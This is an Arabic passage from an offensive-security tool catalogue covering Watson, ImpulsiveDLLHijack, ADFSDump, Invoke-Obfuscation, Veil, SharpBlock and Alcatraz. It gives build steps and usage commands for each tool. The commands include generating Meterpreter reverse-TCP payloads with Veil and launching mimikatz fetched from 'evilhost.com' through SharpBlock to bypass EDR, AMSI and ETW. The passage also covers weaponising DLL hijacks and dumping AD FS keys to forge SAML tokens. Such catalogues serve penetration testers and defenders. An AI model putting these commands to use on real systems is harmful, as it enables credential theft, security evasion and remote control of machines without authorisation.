### [🔙](#tool-list)[واتسون](https://github.com/rasta-mouse/Watson)

واتسون هي أداة .NET مصممة لتعداد التحديثات الأمنية المفقودة (KBs) واقتراح استغلالات لثغرات تصعيد الامتيازات.

رائعة لتحديد التصحيحات المفقودة واقتراح استغلالات يمكن استخدامها لاستغلال الثغرات المعروفة من أجل الحصول على صلاحيات أعلى على النظام.

**التثبيت:**

استخدام [إصدار Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). افتح [مشروع Watson .sln](https://github.com/rasta-mouse/Watson)، اختر "Release"، وقم بالبناء.

**الاستخدام:**```bash
# Run all checks
Watson.exe

صورة

نص الصورة مأخوذ من https://github.com/rasta-mouse/Watson#usage

🔙ImpulsiveDLLHijack

أداة تعتمد على C# تقوم بأتمتة عملية اكتشاف واستغلال اختطاف DLL في الملفات الثنائية المستهدفة.

يمكن تسليح المسارات المخترقة التي تم اكتشافها، أثناء المشاركة، لتجاوز أنظمة EDR.

التثبيت:

  • Procmon.exe -> https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
  • DLL تأكيدية مخصصة :
    • هذه هي ملفات DLL التي تساعد الأداة في الحصول على تأكيد ما إذا تم تحميل DLL بنجاح من مسار الاختطاف المحدد
    • تم تجميعها من مشروع MalDLL المقدم أعلاه (أو استخدم الملفات الثنائية المجمعة مسبقًا إذا كنت تثق بي!)
    • يجب أن يكون اسم DLL 32 بت: maldll32.dll
    • يجب أن يكون اسم DLL 64 بت: maldll64.dll
    • قم بتثبيت حزمة NuGet:** PeNet** -> https://www.nuget.org/packages/PeNet/ (متطلب أساسي أثناء تجميع مشروع ImpulsiveDLLHijack)

ملاحظة: يجب وضع المتطلبات الأساسية i و ii في دليل ImpulsiveDLLHijacks.exe نفسه.

  • معلومات البناء والإعداد:

    • ImpulsiveDLLHijack

      • استنساخ المستودع في Visual Studio
      • بمجرد تحميل المشروع في Visual Studio، انتقل إلى "Project" --> "Manage NuGet packages" --> استعرض الحزم وقم بتثبيت "PeNet" -> https://www.nuget.org/packages/PeNet/
      • قم ببناء المشروع!
      • سيكون ملف ImpulsiveDLLHijack.exe داخل مجلد bin.
    • وبالنسبة لـ DLL التأكيدية:

      • استنساخ المستودع في Visual Studio
      • قم ببناء المشروع بإصدار x86 و x64
      • أعد تسمية إصدار x86 إلى maldll32.dll وإصدار x64 إلى maldll64.dll
    • الإعداد: انسخ ملفات DLL التأكيدية (maldll32 و maldll64) في دليل ImpulsiveDLLHijack.exe ثم قم بتشغيل ImpulsiveDLLHijack.exe :))

تعليمات التثبيت من https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites

الاستخدام:```bash

Help

ImpulsiveDLLHijack.exe -h

Look for vulnerabilities in an executable

ImpulsiveDLLHijack.exe -path BINARY_PATH

root@kitploit:~
يمكن العثور على أمثلة الاستخدام [هنا](https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples).

![image](https://assets.kitploit.com/production/public/readmes/495/acedd276f532d4b77d4a5f9d0d93f9d926ba6b0afd1da582b94410c32eb47ea1.png)

_صورة مأخوذة من https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples_

### [🔙](#tool-list)[ADFSDump](https://github.com/mandiant/ADFSDump)

أداة بلغة C# لتفريغ جميع أنواع الأشياء المفيدة من AD FS.

تم إنشاؤها بواسطة Doug Bienstock [@doughsec](https://twitter.com/doughsec) أثناء عمله في Mandiant FireEye.

صُممت هذه الأداة لتشغيلها بالتزامن مع ADFSpoof. سيقوم ADFSdump بإخراج جميع المعلومات اللازمة لتوليد رموز الأمان باستخدام ADFSpoof.

**المتطلبات:**

- يجب تشغيل ADFSDump تحت سياق مستخدم حساب خدمة AD FS. يمكنك الحصول على هذه المعلومات عن طريق تشغيل قائمة العمليات على خادم AD FS أو من مخرجات cmdlet Get-ADFSProperties. فقط حساب خدمة AD FS لديه الصلاحيات اللازمة للوصول إلى قاعدة بيانات التكوين. حتى مسؤول النطاق (DA) لا يمكنه الوصول إليها.
- يفترض ADFSDump أن الخدمة مهيأة لاستخدام قاعدة بيانات Windows الداخلية (WID). على الرغم من أنه من السهل دعم خادم SQL خارجي، إلا أن هذه الميزة غير موجودة حاليًا.
- يجب تشغيل ADFSDump محليًا على خادم AD FS، وليس على وكيل تطبيقات الويب لـ AD FS. لا يمكن الوصول إلى WID محليًا إلا عبر named pipe.

**التثبيت: (Compile)**

تم بناء ADFSDump باستخدام .NET 4.5 مع Visual Studio 2017 Community Edition. ببساطة افتح ملف المشروع .sln، اختر "Release"، ثم قم بالبناء.

**الاستخدام: (Flags)**```bash
# The Active Directory domain to target. Defaults to the current domain.
/domain:

# The Domain Controller to target. Defaults to the current DC.
/server:

# Switch. Toggle to disable outputting the DKM key.
/nokey

# (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.
/database

مدونة - استكشاف هجوم SAML الذهبي ضد ADFS

image

الصورة مستخدمة من https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs

التهرب الدفاعي

🔙Invoke-Obfuscation

مُبهم لأوامر ونصوص PowerShell متوافق مع PowerShell v2.0+. إذا كان بإمكان نقطة نهاية الضحية تنفيذ PowerShell، فإن هذه الأداة رائعة لإنشاء نصوص مبهمة بشدة.

تثبيت:```bash git clone https://github.com/danielbohannon/Invoke-Obfuscation.git

root@kitploit:~
**الاستخدام:**```bash
./Invoke-Obfuscation

image

🔙Veil

Veil هي أداة لتوليد حمولات metasploit التي تتجاوز حلول مكافحة الفيروسات الشائعة.

يمكن استخدامها لتوليد شيل كود مشوش، راجع المدونة الرسمية لإطار عمل Veil لمزيد من المعلومات.

التثبيت: (Kali)```bash apt -y install veil /usr/share/veil/config/setup.sh --force --silent

root@kitploit:~
**تثبيت: (Git)**```bash
sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent

الاستخدام:```bash

List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)

./Veil.py -t Ordnance --list-payloads

List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)

./Veil.py -t Ordnance --list-encoders

Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234

./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234

List all payloads (–list-payloads) for the tool Evasion (-t Evasion)

./Veil.py -t Evasion --list-payloads

Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris

./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris

root@kitploit:~
كتب منشئو Veil [منشور مدونة](https://www.veil-framework.com/veil-command-line-usage/) لطيفًا يشرح استخدام سطر الأوامر للذخيرة والتهرب بشكل أكبر.

![image](https://assets.kitploit.com/production/public/readmes/495/81bc6fbd0f46783257bcb6d33b67781336ee9d270182aeff0e5e568f8ac4e613.png)

### [🔙](#tool-list)[SharpBlock](https://github.com/CCob/SharpBlock)

طريقة لتجاوز وحدات DLL الخاصة بالإسقاط النشط لـ EDR عن طريق منع تنفيذ نقطة الدخول.

**الميزات:**

- يمنع تنفيذ نقطة دخول DLL الخاصة بـ EDR، مما يمنع وضع خطافات EDR.
- تجاوز AMSI بدون تصحيح (Patchless) لا يمكن اكتشافه من قبل الماسحات الضوئية التي تبحث عن تصحيحات كود Amsi.dll في وقت التشغيل.
- عملية مضيفة يتم استبدالها بـ PE محمل (implant) يمكن تحميله من القرص أو HTTP أو الأنبوب المسمى (Cobalt Strike).
- يتم إخفاء العملية المحملة للمساعدة في تجنب الماسحات الضوئية التي تبحث عن العمليات المجوفة.
- يتم تزييف وسائط سطر الأوامر وزرعها بعد إنشاء العملية باستخدام طريقة اكتشاف EDR خفية.
- تجاوز ETW بدون تصحيح.
- يمنع استدعاء NtProtectVirtualMemory عندما يكون المستدعي ضمن نطاق مساحة عنوان DLL محظور.

**التثبيت:**

استخدم [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) لتجميع ثنائي SharpBlock.

افتح [مشروع SharpBlock .sln](https://github.com/CCob/SharpBlock)، اختر "Release"، وقم بالبناء.

**الاستخدام:**```bash
# Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

# Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

منشور مدونة رائع من PenTestPartners هنا.

image

الصورة مأخوذة من https://youtu.be/0W9wkamknfM

🔙Alcatraz

Alcatraz هي أداة إخفاء ثنائي (obfuscator) بواجهة رسومية (GUI) لـ x64 قادرة على إخفاء ملفات PE مختلفة بما في ذلك:

  • .exe
  • .dll
  • .sys

بعض ميزات الإخفاء المدعومة تشمل:

  • إخفاء الحركات الفورية (immediate moves)
  • تسطيح تدفق التحكم
  • تحوير ADD
  • إخفاء نقطة الدخول
  • إخفاء LEA

Read more

تنزيل الأداة